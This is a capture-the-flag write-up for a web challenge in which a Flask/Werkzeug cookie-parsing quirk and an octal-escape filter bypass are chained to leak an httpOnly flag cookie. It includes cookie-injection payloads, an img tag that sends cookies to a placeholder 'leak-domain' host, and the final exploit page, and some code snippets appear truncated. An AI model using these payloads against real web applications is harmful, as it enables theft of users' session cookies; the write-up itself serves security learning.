
title: Another HTML Renderer
date: Nov 03, 2023
tags: Writeup Web XSS

Another HTML Renderer

Difficulty: 500 points | 0 solves

Description: Is this really an XSS challenge 🤔


Author: Me :p

Table of content

🕵️ Recon

This challenge has a very minimalist HTML rendering interface:


With a short flask back-end with only one route (excluding /report):

def index():
    settings = ""
        settings = loads(request.cookies.get("settings"))
    except: pass

    if settings:
        res = make_response(render_template("index.html",
            backgroundColor=settings["backgroundColor"] if "backgroundColor" in settings else "#ffde8c",
            textColor=settings["textColor"] if "textColor" in settings else "#000000",
            html=settings["html"] if "html" in settings else ""
        res = make_response(render_template("index.html", backgroundColor="#ffde8c", textColor="#000000"))
        res.set_cookie("settings", "{}")

    return res

As we can see, there is a cookie based settings management. One the other part, the front-end renders the HTML using a very strong sandboxed iframe's configuration:

<iframe id="render" sandbox="" srcdoc="<style>* { text-align: center; }</style>{{html}}" width="70%" height="500px"></iframe>

Due to sandbox="" attribute, the iframe doesn't share the same origin as the top window and block any javascript execution.

Additionally, the only exposed GET parameter is settings= which allows to configure the backgroundColor and the textColor:

window.onload = () => {
    // settings init
    const params = (new URLSearchParams(;
    if (params.get("settings")) {
        window.settings = getSettings(params.get("settings"));
    // ...

The final goal of the challenge is to leak the flag cookie:

await page.setCookie({
    "name" : "flag",
    "value" : "GH{FAKE_FLAG}",
    "domain" : host,
    "httpOnly": true,
    "sameSite": "Lax"

As you can see, even using an XSS, it won't be possible to read the flag.

🍪 Settings partial cookie injection

At first glance, the challenge might look impossible or requiring a 0 day. Therefore, there is a small mistake in the code that could be abused:

const saveSettings = (settings) => {
    document.cookie = `settings=${settings}`;

// ...
// can't load HTML from qs.
const getSettings = (d) => {
    try {
        s = JSON.parse(d);
        delete s.html;
        return JSON.stringify(s);
    } catch {
        while (d != d.replaceAll("html", "")) {
            d = d.replaceAll("html", "");
        return d;

window.onload = () => {
    // settings init
    const params = (new URLSearchParams(;
    if (params.get("settings")) {
        window.settings = getSettings(params.get("settings"));
    } else {
        window.settings = getCookie("settings");
    window.settings = JSON.parse(window.settings);

In the above snippet, in case the user provides an invalid JSON, it will remove html from the input string and use this inside:

document.cookie = `settings=${settings}`;

This might look insignificant as a valid JSON is required for the application to work, however it still can be used to fully control the settings cookie :p

var user_input  = `XXXXX; path=/`;
document.cookie = `settings=${user_input}`;

This can be used to set several settings cookies with a custom value.

❓ Werkzeug bad cookie parsing

The previous gadget is funny but, how can this be abuse in some way? 🤔

This is where the werkzeug power becomes interesting 👀

Looking into the werkzeug Cookie header parsing, we can find the following regex:

_cookie_re = re.compile(
    flags=re.ASCII | re.VERBOSE,

What's wrong with this regex?

In fact, in case a cookie value starts with a ", it will match any chars (even ;), until finding another ". If this 2nd " exist, and the following chars is an ;, it will resolve it as the cookie value :)

In other words:

document.cookie = `a="mizu`;
document.cookie = `aa=mizu"`;


In order to take part of this, it is import to know how does browsers sort cookie:

1. Domain and Path
2. Creation Time
3. Cookie Size
4. Expiration Time
5. ...

So, by creating 2 settings cookie, it is possible to generate to following setup 🔥

Cookie: settings="aa; flag=GH{FAKE_FLAG}; settings=aa"

Which will result in 1 settings cookie containing the flag into it.

💧 Leaking the flag

Using the werkzeug bad cookie parsing, we can wrap several cookie together, but how could it be leak without HTML Injection / XSS?

In fact, there is another werkzeug behavior that we can use to get an HTML Injection:

_cookie_unslash_re = re.compile(rb"\\([0-3][0-7]{2}|.)")

def _cookie_unslash_replace(m: t.Match[bytes]) -> bytes:
    v =

    if len(v) == 1:
        return v

    return int(v, 8).to_bytes(1, "big")

# ...
if len(cv) >= 2 and cv[0] == cv[-1] == '"':
    cv = _cookie_unslash_re.sub(
        _cookie_unslash_replace, cv[1:-1].encode()

In the above code snippet, in case the cookie value start / end with a " (which is what we are abusing), it will decode the \{octal} value to string! 🤨

Using it, we can bypass the html replace security using \150tml

const getSettings = (d) => {
    try {
        s = JSON.parse(d);
        delete s.html;
        return JSON.stringify(s);
    } catch {
        while (d != d.replaceAll("html", "")) {
            d = d.replaceAll("html", "");
        return d;

Thanks to this bypass, we can create the following setup:

Cookie: settings="{\"\150tml\": "<img src='https://leak-domain/?cookie= ;flag=GH{FAKE_FLAG}; settings='>\"}"

Which will result in the following back-end settings cookie value: 🤯

    "html": "<img src='https://leak-domain/?cookie= ;flag=GH{FAKE_FLAG}; settings='>"

Even if this input is reflected input a sandboxed iframe, the image will be load leaking the flag cookie 😎

💥 TL/DR: Chain everything together

1. Set the first part of the settings cookie to /render.
2. Set the second part of the settings cookie to /.
3. Redirect to bot to /render.

    // 1
    var part1 =`"{\\"\\150tml\\":\\"<img src=';path=/render`);

    var part2 =`'>\\"}";path=/`);

    // 3
    setTimeout(() => {
        location.href = "";
    }, 500);

🚩 Retrieve the flag

Host the previous HTML file on an HTTP server and send the bot into it:


Flag: GH{WtF_1s_Th4t_C00ki3_P4rS1ng} 🎉